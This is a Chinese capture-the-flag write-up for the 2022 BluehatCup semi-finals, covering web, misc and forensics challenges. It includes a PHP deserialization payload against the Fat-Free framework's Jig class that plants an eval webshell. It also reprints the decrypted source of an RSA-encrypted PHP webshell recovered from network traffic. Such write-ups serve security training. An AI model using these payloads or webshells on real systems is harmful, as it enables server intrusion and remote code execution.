月度归档: 2022 年 8 月

2022 BluehatCup Semi-Finals | Partly Writeup

Web

easyfatfree

扫出www.zip

直接审

image-20220804095330982

$this->write()

image-20220804095401625

\Base::instance()

image-20220804095431323

直接就能写马

<?php

namespace DB {

    class Jig {
        public $dir;
        public $data;
        public $lazy;
        public $format;
    }
}

namespace {

    $jig = new DB\Jig();
    $jig->lazy = True;
    $jig->dir = '/var/www/html/';
    $jig->data = ["shell.php" =>['<?php eval($_POST[a]); ?>']];
    $jig->format = 0;
    echo serialize($jig);
}

根目录不能写,换/ui/

image-20220804095525146

有disable_function

用蚁剑bypass

image-20220804095556257

onelinephp

非预期:

同之前国赛的一个题,flag放在了/etc/profile.d/pouchenv.sh/etc/instanceInfo

image-20220804124358948

直接cat

image-20220804124443276

预期解:

Misc

神秘的日志

看system日志,找到第一次使用ntlm的时间

image-20220804110851180

再从security日志中找到对应时间的登录日志,找最早的那个

image-20220804110950964

右键复制成文本才能看到TimeCreated SystemTime

<TimeCreated SystemTime="2022-04-17T03:27:06.7108313Z" />

image-20220804111131562

flag{dafd0428f634aefd1ddb26f8257c791f}

加密的通道

从http协议分析,可以找到如下代码

image-20220804145429831

解码后可以看到上传了个rsa.php

image-20220804145559703

但是rsa.php是被加密后的

phpjiami 数种解密方法 | 离别歌 (leavesongs.com)

这里采用手工dump法

image-20220804144121775

源码如下:

?><?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
eval($cmd);

接下来流量重放即可

修改下代码,在本地起php环境

<?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
     echo $k.":::";
     var_dump($_POST[$k]);
}
}
var_dump($cmd);
// eval($cmd);

最后一条流量显示出有flag.txt,于是看倒数第二条流量

重放解密

image-20220804145238363
image-20220804145249137

substr($_POST["k85c8f24ca50da"], 2)进行base64解码就是flag

image-20220804145325060

取证

手机取证_1

image.png

手机取证_2

image.png

exe_1

导入微步云沙箱

image.png

exe_2

导入微步云沙箱

image.png

exe_3

导入微步云沙箱

image.png

exe_4

image.png
image.png

挖矿

exe_5

导入微步云沙箱

image.png

apk2

image.png
image.png

apk3

image.png

apk反编译 发现loadUrl

apk5

反编译apk文件

image.png
image.png

apk7

MainActivity有几个分支代表有几个页面。

image.png

apk8

红星.ipa导出,解压,\123123123123213\Payload\0B5A51EA-18C7-4B3F-B1EF-1D48955CD71F\红星.app

image.png
image.png

apk12

image.png

apk13

image.png

安装软件,默认6661

apk15

image.png
image.png